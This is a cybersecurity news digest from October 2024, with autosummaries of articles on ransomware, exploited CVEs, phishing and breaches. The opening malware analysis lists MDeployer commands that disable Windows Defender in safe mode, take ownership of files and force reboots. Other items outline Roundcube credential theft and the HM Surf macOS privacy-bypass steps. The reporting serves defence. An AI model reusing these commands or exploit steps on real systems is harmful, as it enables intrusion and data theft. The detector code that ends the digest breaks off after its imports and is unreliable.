        Additional MDeployer file paths: C:\Windows\Debug\b.cache, C:\Windows\Debug\a.cache, C:\Windows\Debug\fail.txt, C:\Windows\Debug\stop.exe. Commands used by MDeployer: reg delete HKLM\SYSTEM\CurrentControlSet\Control\Safeboot\Network\WinDefend /f; C:\Windows\System32\cmd.exe /c takeown /R /A /F; {default} safeboot; C:\Windows\System32\cmd.exe /c ping localhost -n 5 > nul & del C:\Windows\Debug\dtest.dll; shutdown -r -f -t 00; C:\Windows\praxisbackup.exe; C:\Windows\Debug\pay.exe.
        Decryption and dropping of vulnerable driver probmon.sys: driver loading is consistent with s4killer: enabling the SeLoadDriverPrivilege necessary for loading and unloading device drivers, creating a service via CreateServiceW, creating additional registry keys, required for filter loading, in HKLM\SYSTEM\ControlSet001\services\<service_name>, and loading a minifilter driver into the system via FilterLoad. In this particular case, MS4Killer abuses an older, vulnerable minifilter driver: probmon.sys, version 3.0.0.4 (Figure 7), signed by an already revoked certificate from ITM System Co.,LTD. Attributes of the exploited driver probmon.sys: Subject C KR, Valid from 2011-06-08 06:01:39, Valid to 2014-06-07 08:32:23. Loading probmon.sys: as mentioned previously, the legitimate vulnerable driver is embedded as an RC4-encrypted blob (using the key FGFOUDa87c21Vg+cxrr71boU6EG+QC1mwViTciNaTUBuW4gQbcKboN9THK4K35sL), which is also XOR encrypted, in the MS4Killer binary.
        String decryption: MS4Killer uses encryption to hide embedded strings in the binary from plain sight: specifically, it XORs log message strings, the RC4 key used to decrypt the embedded driver, and the list of process names to terminate. (Figure: Decryption of log message after OpenProcessToken API call.) Figure 11 shows a code snippet, where, in that particular case, only process names ERAAgent.exe and ekrn.exe, which are from ESET products, are compared against the running processes.
        MITRE ATT&CK techniques: this table was built using version 15 of the MITRE ATT&CK framework. "


        Ex-president of Peru gets 20 years for corruption

        latam
        2024-10-22 https://www.bbc.com/news/articles/cx252e2q055o
        Prosecutors say Alejandro Toledo took $35m in bribes from a Brazilian construction company. "

        Autosummary: "


        IT security and government services: Balancing transparency and security

        government
        2024-10-22 https://www.helpnetsecurity.com/2024/10/22/government-it-leaders/

        Government information technology leaders find themselves at a challenging balance point: On one end of the scale are increasing threats from cyber actors, bolstered by advanced technology like artificial intelligence (AI); on the other end is a longstanding commitment to providing transparent services to residents via digital means, including access to public records, reports, meeting minutes, and more. Over a third (34%) of state and local governments were hit by ransomware this year, according to … More

        The post IT security and government services: Balancing transparency and security appeared first on Help Net Security.

        "

        Autosummary: Government information technology leaders find themselves at a challenging balance point: On one end of the scale are increasing threats from cyber actors, bolstered by advanced technology like artificial intelligence (AI); on the other end is a longstanding commitment to providing transparent services to residents via digital means, including access to public records, reports, meeting minutes, and more. State and local governments will continue to grapple with rising cyberattacks, but with the right strategy, government IT leaders can defend their assets, while still retaining transparent, frictionless services to residents. "


        Phishing scams and malicious domains take center stage as the US election approaches

        financial
        2024-10-22 https://www.helpnetsecurity.com/2024/10/22/us-election-phishing-activity/

        Phishing scams aimed at voters, malicious domain registrations impersonating candidates, and other threat activity designed to exploit unassuming victims take center stage as the US election approaches, according to Fortinet. “As the 2024 US presidential election approaches, it’s critical to recognize and understand the cyberthreats that may impact the integrity and trustworthiness of the election process and the welfare of the participating citizens. Cyber adversaries, including state-sponsored actors and hacktivist groups, are increasingly active leading … More

        The post Phishing scams and malicious domains take center stage as the US election approaches appeared first on Help Net Security.

        "

        Autosummary: The analysis continues to show a significant number of diverse databases available on darknet forums targeting the US, including SSNs, usernames, email addresses, passwords, credit card data, date of birth, and other PII that could be used to challenge the integrity of the 2024 US election. "


        Myths holding women back from cybersecurity careers

        ciber
        2024-10-22 https://www.helpnetsecurity.com/2024/10/22/dr-kathryn-jones-cardiff-university-women-cybersecurity-career/

        In this Help Net Security interview, Dr Kathryn Jones, Head of School, Computer Science and Informatics at Cardiff University, discusses the challenges and misconceptions that deter women from pursuing careers in cybersecurity. Dr Jones also outlines the diverse skills, mentorship, and outreach programs that empower women to thrive in cybersecurity careers. What are some common misconceptions or biases that may deter women from pursuing a career in cybersecurity? One misconception is the stereotype of a … More

        The post Myths holding women back from cybersecurity careers appeared first on Help Net Security.

        "

        Autosummary: At Cardiff School of Computer Science and Informatics, our Director of Teaching, Elaine Haigh, and Dr Yulia Cherdantseva, director of our Academic Centre of Excellence in Cyber Security Education, are both strong leaders with expertise in cybersecurity and play a significant role leading and enhancing our educational offering. Additionally, our Cyber Innovation Hub, led by Professor Pete Burnap, plays a vital role in providing opportunities for individuals to upskill, incubate, and grow start-up ideas. In Wales, for example, the Women in Cyber group offers a well-established community where women can meet regularly to share experiences, discuss challenges, and find support. "


        VMware Releases vCenter Server Update to Fix Critical RCE Vulnerability

        exploits
        2024-10-22 https://thehackernews.com/2024/10/vmware-releases-vcenter-server-update.html
        VMware has released software updates to address an already patched security flaw in vCenter Server that could pave the way for remote code execution. The vulnerability, tracked as CVE-2024-38812 (CVSS score: 9.8), concerns a case of heap-overflow vulnerability in the implementation of the DCE/RPC protocol. "A malicious actor with network access to vCenter Server may trigger this vulnerability by "

        Autosummary: "


        CISA Adds ScienceLogic SL1 Vulnerability to Exploited Catalog After Active Zero-Day Attack

        exploits
        2024-10-22 https://thehackernews.com/2024/10/cisa-adds-sciencelogic-sl1.html
        The U.S. Cybersecurity and Infrastructure Security Agency (CISA) on Monday added a critical security flaw impacting ScienceLogic SL1 to its Known Exploited Vulnerabilities (KEV) catalog, following reports of active exploitation as a zero-day. The vulnerability in question, tracked as CVE-2024-9537 (CVSS v4 score: 9.3), refers to a bug involving an unspecified third-party component that could "

        Autosummary: " Earlier this month, CISA added another critical flaw impacting Fortinet FortiOS, FortiPAM, FortiProxy, and FortiWeb (CVE-2024-23113, CVSS score: 9.8) to its KEV catalog, based on evidence of in-the-wild exploitation. "


        VMware fixes critical vCenter Server RCE bug – again! (CVE-2024-38812)

        exploits
        2024-10-22 https://www.helpnetsecurity.com/2024/10/22/cve-2024-38812-cve-2024-38813-fixed-again/

        Broadcom has released new patches for previously fixed vulnerabilities (CVE-2024-38812, CVE-2024-38813) in vCenter Server, one of which hasn’t been fully addressed the first time and could allow attackers to achieve remote code execution. The vulnerabilities were privately reported by zbl & srs of team TZL – researchers who participated in the 2024 Matrix Cup in June 2024. Broadcom maintains that they are not currently aware of exploitation “in the wild.” CVE-2024-38812 and CVE-2024-38813 VMware vCenter … More

        The post VMware fixes critical vCenter Server RCE bug – again! (CVE-2024-38812) appeared first on Help Net Security.

        "

        Autosummary: Apply the new patches. Aside from completing the fix for CVE-2024-38812, the new updates resolve an operational issue created by the first patch: session timeouts when accessing vCenter. "


        Palo Alto Networks extends security into harsh industrial environments

        industry
        2024-10-22 https://www.helpnetsecurity.com/2024/10/22/palo-alto-networks-ot-security/

        The convergence of IT and operational technology (OT) and the digital transformation of OT have created new opportunities for innovation and efficiency in critical Industrial Automation and Control Systems. However, these advancements also broaden the potential attack surface, making it even more crucial to improve and extend security for OT environments. Palo Alto Networks introduced new capabilities in its OT Security solution, including the industry’s only fully integrated, risk-based guided virtual patching solution, powered by … More

        The post Palo Alto Networks extends security into harsh industrial environments appeared first on Help Net Security.

        "

        Autosummary: Palo Alto Networks introduced new capabilities in its OT Security solution, including the industry’s only fully integrated, risk-based guided virtual patching solution, powered by Precision AI, the Prisma Access Browser with Privileged Remote Access and a suite of ruggedized, ML-powered Next-Generation Firewalls (NGFWs) built to withstand harsh industrial settings where traditional firewalls often cannot operate. "


        Roundcube XSS flaw exploited to steal credentials, email (CVE-2024-37383)

        exploits
        2024-10-22 https://www.helpnetsecurity.com/2024/10/22/cve-2024-37383-exploited/

        Attackers have exploited an XSS vulnerability (CVE-2024-37383) in the Roundcube Webmail client to target a governmental organization of a CIS country, Positive Technologies (PT) analysts have discovered. The vulnerability was patched in May 2024, in Roundcube Webmail versions 1.5.7 and 1.6.7. The email carrying the exploit was sent in June 2024. About CVE-2024-37383 Roundcube is an open-source, browser-based IMAP client with a user interface that makes it look like a standalone application. CVE-2024-37383 is a … More

        The post Roundcube XSS flaw exploited to steal credentials, email (CVE-2024-37383) appeared first on Help Net Security.

        "

        Autosummary: The email body actually contains hidden JavaScript code, which downloads Road map.doc to serve as a decoy, while in the background it: tries to grab messages from the mail server using the ManageSieve plugin, and adds an authorization form to the HTML page displayed to the user, with the hope that the target’s login and password for the Roundcube client will either be autofilled or entered by the target. "


        Bumblebee and Latrodectus Malware Return with Sophisticated Phishing Strategies

        financial exploits
        2024-10-22 https://thehackernews.com/2024/10/bumblebee-and-latrodectus-malware.html
        Two malware families that suffered setbacks in the aftermath of a coordinated law enforcement operation called Endgame have resurfaced as part of new phishing campaigns. Bumblebee and Latrodectus, which are both malware loaders, are designed to steal personal data, along with downloading and executing additional payloads onto compromised hosts. Tracked under the names BlackWidow, IceNova, Lotus, "

        Autosummary: In May 2024, a coalition of European countries said it dismantled over 100 servers linked to several malware strains such as IcedID (and, by extension, Latrodectus), SystemBC, PikaBot, SmokeLoader, Bumblebee, and TrickBot. "


        Cybercriminals Exploiting Docker API Servers for SRBMiner Crypto Mining Attacks

        exploits ciber
        2024-10-22 https://thehackernews.com/2024/10/cybercriminals-exploiting-docker-api.html
        Bad actors have been observed targeting Docker remote API servers to deploy the SRBMiner crypto miner on compromised instances, according to new findings from Trend Micro. "In this attack, the threat actor used the gRPC protocol over h2c to evade security solutions and execute their crypto mining operations on the Docker host," researchers Abdelrahman Esmail and Sunil Bharti said in a technical "

        Autosummary: "


        Experts warn of a new wave of Bumblebee malware attacks

        exploits
        2024-10-22 https://securityaffairs.com/170112/malware/bumblebee-malware-attacks.html
        Experts warn of a new wave of attacks involving the Bumblebee malware, months after Europol’s ‘Operation Endgame‘ that disrupted its operations in May. The Bumblebee malware loader has resurfaced in new attacks, four months after Europol disrupted it during “Operation Endgame” in May. Bumblebee has been active since March 2022 when it was spotted by Google’s Threat Analysis Group […] "

        Autosummary: In addition, with the cooperation of the aforementioned authorities, there have also been police actions in Ukraine, Switzerland, Armenia, Portugal, Romania, Canada, Lithuania and Bulgaria for the arrest or interrogation of suspects, searches or the seizure and downing of servers. "


        U.S. CISA adds ScienceLogic SL1 flaw to its Known Exploited Vulnerabilities catalog

        exploits
        2024-10-22 https://securityaffairs.com/170104/security/u-s-cisa-adds-sciencelogic-sl1-flaw-to-its-known-exploited-vulnerabilities-catalog.html
        U.S. Cybersecurity and Infrastructure Security Agency (CISA) adds ScienceLogic SL1 flaw to its Known Exploited Vulnerabilities catalog. The U.S. Cybersecurity and Infrastructure Security Agency (CISA) added the ScienceLogic SL1 flaw CVE-2024-9537 (CVSS v4 score: 9.3) to its Known Exploited Vulnerabilities (KEV) catalog. ScienceLogic SL1 contains a vulnerability related to a third-party component. It has been fixed in […] "

        Autosummary: U.S. CISA adds ScienceLogic SL1 flaw to its Known Exploited Vulnerabilities catalog Pierluigi Paganini October 22, 2024 U.S. Cybersecurity and Infrastructure Security Agency (CISA) adds ScienceLogic SL1 flaw to its Known Exploited Vulnerabilities catalog. "


        Facebook and Instagram launch celebrity scam ad crackdown

        financial
        2024-10-22 https://www.bbc.com/news/articles/cg565mrdz7zo
        Celebrities including Elon Musk and Martin Lewis repeatedly feature in ads for products they have not endorsed. "

        Autosummary: "


        Exploit released for new Windows Server "WinReg" NTLM Relay attack

        exploits
        2024-10-22 https://www.bleepingcomputer.com/news/security/exploit-released-for-new-windows-server-winreg-ntlm-relay-attack/
        Proof-of-concept exploit code is now public for a vulnerability in Microsoft's Remote Registry client that could be used to take control of a Windows domain by downgrading the security of the authentication process. [...] "

        Autosummary: " In mid-June, Kupchik resubmitted the report with a better proof-of-concept (PoC) and explanation, which led to Microsoft confirming the vulnerability on July 8. "


        Gophish Framework Used in Phishing Campaigns to Deploy Remote Access Trojans

        financial exploits
        2024-10-22 https://thehackernews.com/2024/10/gophish-framework-used-in-phishing.html
        Russian-speaking users have become the target of a new phishing campaign that leverages an open-source phishing toolkit called Gophish to deliver DarkCrystal RAT (aka DCRat) and a previously undocumented remote access trojan dubbed PowerRAT. "The campaign involves modular infection chains that are either Maldoc or HTML-based infections and require the victim's intervention to trigger the "

        Autosummary: The JavaScript is executed using a legitimate Windows binary named "cscript.exe." "The PowerShell loader script masquerading as the INI file contains base64 encoded data blob of the payload PowerRAT, which decodes and executes in the victim's machine memory," Raghuprasad said. "


        Samsung zero-day flaw actively exploited in the wild

        exploits
        2024-10-22 https://securityaffairs.com/170119/security/samsung-zero-day-activey-exploited.html
        Google’s Threat Analysis Group (TAG) researchers warn of a Samsung zero-day vulnerability that is exploited in the wild. Google’s Threat Analysis Group (TAG) warns of a Samsung zero-day vulnerability, tracked as CVE-2024-44068 (CVSS score of 8.1), which is exploited in the wild. The vulnerability is a use-after-free issue, attackers could exploit the flaw to escalate […] "

        Autosummary: Samsung zero-day flaw actively exploited in the wild Pierluigi Paganini October 22, 2024 Google’s Threat Analysis Group (TAG) researchers warn of a Samsung zero-day vulnerability that is exploited in the wild. "


        Windows 10 KB5045594 update fixes multi-function printer bugs

        exploits
        2024-10-22 https://www.bleepingcomputer.com/news/microsoft/windows-10-kb5045594-update-fixes-multi-function-printer-bugs/
        Microsoft has released the optional KB5045594 preview cumulative update for Windows 10 22H2 with fixes for problems printing to multi-function printers and other issues. [...] "

        Autosummary: Windows 10 KB5045594 cumulative update (Source: BleepingComputer). As this is an optional update, you will be asked whether you wish to install it by clicking the "Download and install" link, as shown in the image below. What's new in Windows 10 KB5045594: With this update, Microsoft has introduced eight fixes and one new feature, which are listed below: [Start menu] New! Fixed: When you use a USB cable to connect to a Multi-Function Printer (MFP), it prints specific network command text when you do want it to. Windows users can install this update by going into Settings, clicking on Windows Update, and manually performing a "Check for Updates." "


        Evolving cybercriminal tactics targeting SMBs

        industry ciber
        2024-10-21 https://www.helpnetsecurity.com/2024/10/21/bec-human-error-video/

        A recent Todyl report revealed a 558% increase in BEC (Business Email Compromise), AiTM (Adversary-in-the-Middle), and ATO (Account Takeover) attacks in 2024. In this Help Net Security video, David Langlands, Chief Security Officer at Todyl, discusses these evolving cyber threats. Here are the key findings from the report: BEC is evolving as attackers shift from traditional malware to exploiting human error and vulnerable communication channels. Attackers are exploiting gaps in security like the lack of … More

        The post Evolving cybercriminal tactics targeting SMBs appeared first on Help Net Security.

        "

        Autosummary: "


        "Nothing can bring a life back": Brazil dam collapse survivors speak as UK trial begins

        latam
        2024-10-21 https://www.bbc.com/news/articles/c0r8eg7nnkwo
        A lawsuit against mining company BHP starts in London on Monday over the 2015 dam collapse. "

        Autosummary: “Some processes are taking longer than expected, because it is quite complex, but for the families that chose quickly to have their houses built here, their houses are ready, and they have already moved in.” Marcos Muniz, known as Marquinhos, moved to one of the towns that was hit - Bento Rodrigues - in 1969, when he was six years old, to the same house where his father was born. A separate trial against Samarco’s second parent company, Brazilian mining company Vale, is taking place in the Netherlands, with about 70,000 plaintiffs. "


        The Internet Archive breach continues

        ransomware
        2024-10-21 https://www.helpnetsecurity.com/2024/10/21/internet-archive-breach-continues/

        Cybersecurity troubles are not over for the Internet Archive (IA), the nonprofit organization behind the popular digital library site: after the recent DDoS attacks, defacement and data breach, an email sent via its Zendesk customer service platform has shown that some of its IT assets remain compromised. The initial attacks Two weeks ago, the Internet Archive was made inaccessible by several DDoS attacks claimed by pro-Palestinian hacktivists. In the days before the first one, a … More

        The post The Internet Archive breach continues appeared first on Help Net Security.

        "

        Autosummary: A new development On Friday, October 18, IA’s founder Brewster Kahle said that the stored data of the Internet Archive is safe, and that “the Wayback Machine, Archive-It, scanning, and national library crawls have resumed, as well as email, blog, helpdesk, and social media communications.” "


        This industry profits from knowing you have cancer, explains Cody Venzke (Lock and Code S05E22)

        industry
        2024-10-21 https://www.malwarebytes.com/blog/podcast/2024/10/this-industry-profits-from-knowing-you-have-cancer-explains-cody-venzke-lock-and-code-s05e22
        This week on the Lock and Code podcast, we speak with Cody Venzke about why data brokers are allowed to collect everything about us. "

        Autosummary: Today, on the Lock and Code podcast with host David Ruiz, we speak with Cody Venzke, senior policy counsel with the ACLU, about how data brokers collect their information, what data points are off-limits (if any), and how people can protect their sensitive information, along with the harms that come from unchecked data broker activity—beyond just targeted advertising. "


        Fortinet releases patches for undisclosed critical FortiManager vulnerability

        exploits
        2024-10-21 https://www.helpnetsecurity.com/2024/10/21/fortimanager-critical-vulnerability/

        In the last couple of days, Fortinet has released critical security updates for FortiManager, to fix a critical vulnerability that is reportedly being exploited by Chinese threat actors. Security updates are trickling out The company, which is known for pushing out fixes for critical vulnerabilities before disclosing their existence to the public, has privately notified select customers a week ago and shared temporary mitigation advice. The advice apparently includes configuring FortiManager to prevent devices with … More

        The post Fortinet releases patches for undisclosed critical FortiManager vulnerability appeared first on Help Net Security.

        "

        Autosummary: "


        Chinese Nation-State Hackers APT41 Hit Gambling Sector for Financial Gain

        financial government
        2024-10-21 https://thehackernews.com/2024/10/chinese-nation-state-hackers-apt41-hit.html
        The prolific Chinese nation-state actor known as APT41 (aka Brass Typhoon, Earth Baku, Wicked Panda, or Winnti) has been attributed to a sophisticated cyber attack targeting the gambling and gaming industry. "Over a period of at least six months, the attackers stealthily gathered valuable information from the targeted company including, but not limited to, network configurations, user passwords, "

        Autosummary: "Over a period of at least six months, the attackers stealthily gathered valuable information from the targeted company including, but not limited to, network configurations, user passwords, and secrets from the LSASS process," Ido Naor, co-founder and CEO of Israeli cybersecurity company Security Joes, said in a statement shared with The Hacker News. "


        THN Cybersecurity Recap: Top Threats, Tools and News (Oct 14 - Oct 20)

        ciber
        2024-10-21 https://thehackernews.com/2024/10/thn-cybersecurity-recap-top-threats_21.html
        Hi there! Here’s your quick update on the latest in cybersecurity. Hackers are using new tricks to break into systems we thought were secure—like finding hidden doors in locked houses. But the good news? Security experts are fighting back with smarter tools to keep data safe. Some big companies were hit with attacks, while others fixed their vulnerabilities just in time. It's a constant battle. "

        Autosummary: " Trending CVEs: CVE-2024-38178, CVE-2024-9486, CVE-2024-44133, CVE-2024-9487, CVE-2024-28987, CVE-2024-8963, CVE-2024-40711, CVE-2024-30088, CVE-2024-9164. Top News: Apple macOS Flaw Bypasses Privacy Controls in Safari Browser: Microsoft has disclosed details about a now-patched security flaw in Apple's Transparency, Consent, and Control (TCC) framework in macOS that could be abused to get around a user's privacy preferences and access data. Cybersecurity Resources & Insights: LIVE Webinars: The exact steps that transformed their data security overnight; Insider tricks to implement DSPM with minimal disruption; The roadmap that slashed security incidents by 70%. Join Ian Ahl, Mandiant's former threat-hunting mastermind, as he: decrypts LUCR-3's shadowy tactics that breach 9 out of 10 targets; unveils the Achilles' heel in your cloud defenses you never knew existed; arms you with the counterpunch that leaves LUCR-3 reeling. This isn't a webinar. 87,000+ Internet-Facing Fortinet Devices Vulnerable to CVE-2024-23113: About 87,390 Fortinet IP addresses are still likely susceptible to a critical code execution flaw (CVE-2024-23113, CVSS score: 9.8), which was recently added to the U.S. Cybersecurity and Infrastructure Security Agency (CISA) Known Exploited Vulnerabilities (KEV) catalog. Google Outlines Two-Pronged Approach to Tackle Memory Safety Challenges: Google said it's migrating to memory-safe languages such as Rust, Kotlin, Go, as well as exploring interoperability with C++ through Carbon, to ensure a seamless transition. "


        Unknown threat actors exploit Roundcube Webmail flaw in phishing campaign

        financial exploits
        2024-10-21 https://securityaffairs.com/170055/hacking/roundcube-flaw-exploited-in-phishing-attack.html
        Hackers exploited a now-patched Roundcube flaw in a phishing attack to steal user credentials from the open-source webmail software. Researchers from Positive Technologies warn that unknown threat actors have attempted to exploit a now-patched vulnerability, tracked as CVE-2024-37383 (CVSS score: 6.1), in the open-source Roundcube webmail software. The attackers have exploited the flaw as part of […] "

        Autosummary: Unknown threat actors exploit Roundcube Webmail flaw in phishing campaign Pierluigi Paganini October 21, 2024 Hackers exploited a now-patched Roundcube flaw in a phishing attack to steal user credentials from the open-source webmail software. "


        Bumblebee malware returns after recent law enforcement disruption

        exploits
        2024-10-21 https://www.bleepingcomputer.com/news/security/bumblebee-malware-returns-after-recent-law-enforcement-disruption/
        The Bumblebee malware loader has been spotted in new attacks recently, more than four months after Europol disrupted it during "Operation Endgame" in May. [...] "

        Autosummary: In May, an international law enforcement operation codenamed "Operation Endgame" seized over a hundred servers supporting the multiple malware loader operations, including IcedID, Pikabot, Trickbot, Bumblebee, Smokeloader, and SystemBC. "


        Cisco states that data published on cybercrime forum was taken from public-facing DevHub environment

        government
        2024-10-21 https://securityaffairs.com/170075/cyber-crime/cisco-confirms-a-security-breach.html
        Cisco confirms that data published by IntelBroker on a cybercrime forum was taken from the company DevHub environment. Cisco confirms that the data posted by IntelBroker on a cybercrime forum was stolen from its DevHub environment. IntelBroker claimed to have gained access to Github projects, Gitlab Projects, SonarQube projects, Source code, hard coded credentials, Certificates, […] "

        Autosummary: IntelBroker claimed to have gained access to Github projects, Gitlab Projects, SonarQube projects, Source code, hard coded credentials, Certificates, Customer SRCs, Cisco Confidential Documents, Jira tickets, API tokens, AWS Private buckets, Cisco Technology SRCs, Docker Builds, Azure Storage buckets, Private & Public keys, SSL Certificates, Cisco Premium Products, and other info. "


        Hackers exploit Roundcube webmail flaw to steal email, credentials

        exploits
        2024-10-21 https://www.bleepingcomputer.com/news/security/hackers-exploit-roundcube-webmail-flaw-to-steal-email-credentials/
        Threat actors have been exploiting a vulnerability in the Roundcube Webmail client to target government organizations in the Commonwealth of Independent States (CIS) region, the successor of the former Soviet Union. [...] "

        Autosummary: "An authorization form with the fields rcmloginuser and rcmloginpwd (the user's login and password for the Roundcube client) is added to the HTML page displayed to the user" - Positive Technologies. According to the researchers, the threat actor expects the two fields to be filled, manually or automatically, and thus obtain the target's account credentials. "


        Google Voice scams: What are they and how do I avoid them?

        financial
        2024-10-21 https://www.welivesecurity.com/en/scams/google-voice-scams-what-how-avoid/
        Watch out for schemes where fraudsters trick people into sharing verification codes so they can gain access to their phone numbers "

        Autosummary: Then they may do one of several things: sell your Google Voice number and account to other scammers; place vishing calls designed to scam victims, using your Google Voice account; embed your Google Voice number into email phishing or smishing messages; use the Google Voice voicemail feature to record messages posing as legitimate authorities, in order to further their scams; or use the Google Voice number and spoofing software to call or text your family and friends, asking for emergency funds. The FTC also warns that sometimes the fraudster will try to obtain personally identifiable information from you as well as carry out the Google Voice scam. In our hyper-connected world, technology has transformed the way we communicate, enabling us to connect with anyone, anywhere, at the touch of a button. What to do in a worst-case scenario: If you realize you’ve been the victim of a Google Voice scam, there’s a dedicated page designed to help you reclaim your Voice number. "


        Hackers Exploit Roundcube Webmail XSS Vulnerability to Steal Login Credentials

        exploits
        2024-10-20 https://thehackernews.com/2024/10/hackers-exploit-roundcube-webmail-xss.html
        Unknown threat actors have been observed attempting to exploit a now-patched security flaw in the open-source Roundcube webmail software as part of a phishing attack designed to steal user credentials. Russian cybersecurity company Positive Technologies said it discovered last month that an email was sent to an unspecified governmental organization located in one of the Commonwealth of "

        Autosummary: " The attack chain, per Positive Technologies, is an attempt to exploit CVE-2024-37383 (CVSS score: 6.1), a stored cross-site scripting (XSS) vulnerability via SVG animate attributes that allows for execution of arbitrary JavaScript in the context of the victim"s web browser. "


        SECURITY AFFAIRS MALWARE NEWSLETTER – ROUND 16

        exploits
        2024-10-20 https://securityaffairs.com/170047/malware/security-affairs-malware-newsletter-round-16.html
        Security Affairs Malware newsletter includes a collection of the best articles and research on malware in the international landscape. Expanding the Investigation: Deep Dive into Latest TrickMo Samples; HijackLoader evolution: abusing genuine signing certificates; FASTCash for […] "

        Autosummary: "


        F5 fixed a high-severity elevation of privilege vulnerability in BIG-IP

        exploits
        2024-10-20 https://securityaffairs.com/170022/security/f5-patches-big-ip-elevation-of-privilege-bug.html
        Technology firm F5 patches a high-severity elevation of privilege vulnerability in BIG-IP and a medium-severity flaw in BIG-IQ. F5 addressed two vulnerabilities in BIG-IP and BIG-IQ enterprise products, respectively tracked as CVE-2024-45844 and CVE-2024-47139. An authenticated attacker, with Manager role privileges or higher, could exploit the vulnerability CVE-2024-45844 to elevate privileges and compromise the BIG-IP […] "

        Autosummary: F5 fixed a high-severity elevation of privilege vulnerability in BIG-IP Pierluigi Paganini October 20, 2024 Technology firm F5 patches a high-severity elevation of privilege vulnerability in BIG-IP and a medium-severity flaw in BIG-IQ. "


        Brazil's president cancels Russia trip after injuring head

        latam
        2024-10-20 https://www.bbc.com/news/articles/c89l45zeq2eo
        The 78-year-old president was scheduled to travel to Russia to attend the Brics summit. "

        Autosummary: "


        Crypt Ghouls Targets Russian Firms with LockBit 3.0 and Babuk Ransomware Attacks

        exploits ransomware rusia-ucrania
        2024-10-19 https://thehackernews.com/2024/10/crypt-ghouls-targets-russian-firms-with.html
        A nascent threat actor known as Crypt Ghouls has been linked to a set of cyber attacks targeting Russian businesses and government agencies with ransomware with the twin goals of disrupting business operations and financial gain. "The group under review has a toolkit that includes utilities such as Mimikatz, XenAllPasswordPro, PingCastle, Localtonet, resocks, AnyDesk, PsExec, and others," "

        Autosummary: "


        U.S. CISA adds Veeam Backup and Replication flaw to its Known Exploited Vulnerabilities catalog

        exploits
        2024-10-19 https://securityaffairs.com/170014/security/u-s-cisa-adds-veeam-backup-and-replication-flaw-to-its-known-exploited-vulnerabilities-catalog.html
        U.S. Cybersecurity and Infrastructure Security Agency (CISA) adds Veeam Backup and Replication vulnerability to its Known Exploited Vulnerabilities catalog. The U.S. Cybersecurity and Infrastructure Security Agency (CISA) added the Veeam Backup and Replication flaw CVE-2024-40711 (CVSS score of 9.8) to its Known Exploited Vulnerabilities (KEV) catalog. This week, Sophos researchers warned that ransomware operators are exploiting the […] "

        Autosummary: The most severe flaw included in the September 2024 security bulletin is the critical, remote code execution (RCE) vulnerability CVE-2024-40711 (CVSS v3.1 score: 9.8) impacting Veeam Backup & Replication (VBR). U.S. CISA adds Veeam Backup and Replication flaw to its Known Exploited Vulnerabilities catalog (Pierluigi Paganini, October 19, 2024). U.S. Cybersecurity and Infrastructure Security Agency (CISA) adds Veeam Backup and Replication vulnerability to its Known Exploited Vulnerabilities catalog. "


        North Korea-linked APT37 exploited IE zero-day in a recent attack

        exploits
        2024-10-19 https://securityaffairs.com/169983/apt/north-korea-apt37-ie-zero-day.html
        North Korea-linked group APT37 exploited an Internet Explorer zero-day vulnerability in a supply chain attack. A North Korea-linked threat actor, tracked as APT37 (also known as RedEyes, TA-RedAnt, Reaper, ScarCruft, Group123), exploited a recent Internet Explorer zero-day vulnerability, tracked as CVE-2024-38178 (CVSS score 7.5), in a supply chain attack. Threat intelligence firm AhnLab and South […] "

        Autosummary: A North Korea-linked threat actor, tracked as APT37 (also known as RedEyes, TA-RedAnt, Reaper, ScarCruft, Group123), exploited a recent Internet Explorer zero-day vulnerability, tracked as CVE-2024-38178 (CVSS score 7.5), in a supply chain attack. North Korea-linked APT37 exploited IE zero-day in a recent attack (Pierluigi Paganini, October 19, 2024). North Korea-linked group APT37 exploited an Internet Explorer zero-day vulnerability in a supply chain attack. "


        Omni Family Health data breach impacts 468,344 individuals

        financial
        2024-10-19 https://securityaffairs.com/169972/data-breach/omni-family-health-disclosed-a-data-breach.html
        Omni Family Health disclosed a data breach affecting nearly 470,000 current and former patients and employees. Omni Family Health is a nonprofit organization that provides healthcare services to communities in California, focusing on underserved populations. They offer a range of services, including primary care, dental care, behavioral health, and preventive services. Omni Family Health aims […] "

        Autosummary: The data breach at Omni Family Health may have exposed varying personal information for current and former patients, including names, addresses, Social Security numbers, dates of birth, health insurance details, and medical information. "


        Israeli orgs targeted with wiper malware via ESET-branded emails

        exploits
        2024-10-18 https://www.helpnetsecurity.com/2024/10/18/israel-wiper-eset/

        Attackers have tried to deliver wiper malware to employees at organizations across Israel by impersonating cybersecurity company ESET via email. The attack took the form of a phishing email ostensibly sent by the “Eset Advanced Threat Defense Team”, warning that state-backed hackers have tried compromising the target’s device(s). (Image: The phishing email. Source: A user of the ESET Security Forum.) The email was posted on the ESET Security Forum on October 8 by a … More

        The post Israeli orgs targeted with wiper malware via ESET-branded emails appeared first on Help Net Security.

        "

        Autosummary: The attack took the form of a phishing email ostensibly sent by the “Eset Advanced Threat Defense Team”, warning that state-backed hackers have tried compromising the target’s device(s). "


        Microsoft Reveals macOS Vulnerability that Bypasses Privacy Controls in Safari Browser

        exploits
        2024-10-18 https://thehackernews.com/2024/10/microsoft-reveals-macos-vulnerability.html
        Microsoft has disclosed details about a now-patched security flaw in Apple's Transparency, Consent, and Control (TCC) framework in macOS that has likely come under exploitation to get around a user's privacy preferences and access data. The shortcoming, codenamed HM Surf by the tech giant, is tracked as CVE-2024-44133. It was addressed by Apple as part of macOS Sequoia 15 by removing the "

        Autosummary: The HM Surf exploit devised by Microsoft hinges on performing the following steps: (1) changing the home directory of the current user with the dscl utility, a step that does not require TCC access in macOS Sonoma; (2) modifying the sensitive files (e.g., PerSitePreferences.db) within "~/Library/Safari" under the user's real home directory; (3) changing the home directory back to the original directory, which causes Safari to use the modified files; (4) launching Safari to open a web page that takes a snapshot via the device's camera and grabs the location. The attack could be extended further to save an entire camera stream or stealthily capture audio through the Mac's microphone, Microsoft said. "
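        The HM Surf chain above hinges on a user rewriting their own home directory with dscl, tampering with files under the real ~/Library/Safari, and switching the home directory back before launching Safari. The Python detector below is an added example for this item, not Microsoft's detection logic or any Apple tooling: it runs over process-execution events (the event format is constructed, e.g. what an EDR or Endpoint Security feed would hand you) and flags dscl invocations that rewrite a user record's NFSHomeDirectory attribute, escalates when the same record is rewritten twice inside a short window (the change, tamper, restore pattern), and escalates again when Safari starts for that user shortly after the flip. The dscl attribute name and argument syntax are assumed from the tool's documented form, not stated in the article.

```python
"""Flag dscl-driven home-directory flips of the kind used in the HM Surf chain.
Added example; event format is constructed and the dscl syntax is assumed:
    dscl <datasource> -change <record> <key> <old> <new>
    dscl <datasource> -create <record> <key> <value>"""
import shlex
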